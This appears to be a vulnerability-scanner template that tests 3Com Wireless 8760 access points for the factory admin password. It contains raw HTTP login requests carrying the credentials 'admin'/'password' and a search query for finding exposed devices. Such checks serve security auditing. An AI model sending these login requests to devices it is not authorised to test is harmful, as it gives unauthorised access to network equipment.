id: 3Com-wireless-default-login

info:
  name: 3Com Wireless 8760 Dual Radio - Default Login
  author: ritikchaddha
  severity: high
  description: |
    3COM Wireless 8760 Dual Radio contains a default login vulnerability. Default admin login password 'password' was found.
  reference:
    - https://www.speedguide.net/routers/3com-wl-546-3com-wireless-8760-dual-radio-11abg-1256
  metadata:
    max-request: 1
    fofa-query: title="3COM"
  tags: default-login,3com

http:
  - raw:
      - |
        POST /index.htm HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        userid={{username}}&passwd={{password}}&Submit=LOGIN

      - |
        POST /login.html HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username={{username}}&password={{password}}

    stop-at-first-match: true
    attack: pitchfork
    payloads:
      username:
        - admin
      password:
        - password

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'alt="Advanced Configuration"'
          - 'image/setup_wizard'
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100a7a5661481f35e84ca927a1574e6a7b1b27ccb361354be2361a526339dec9a5502210098c54dbb1de14bbe6bc295ca69566df20d65ab0b3bb0f9ffcdf3f8815c7684cc:922c64590222798bb761d5b6d8e72950
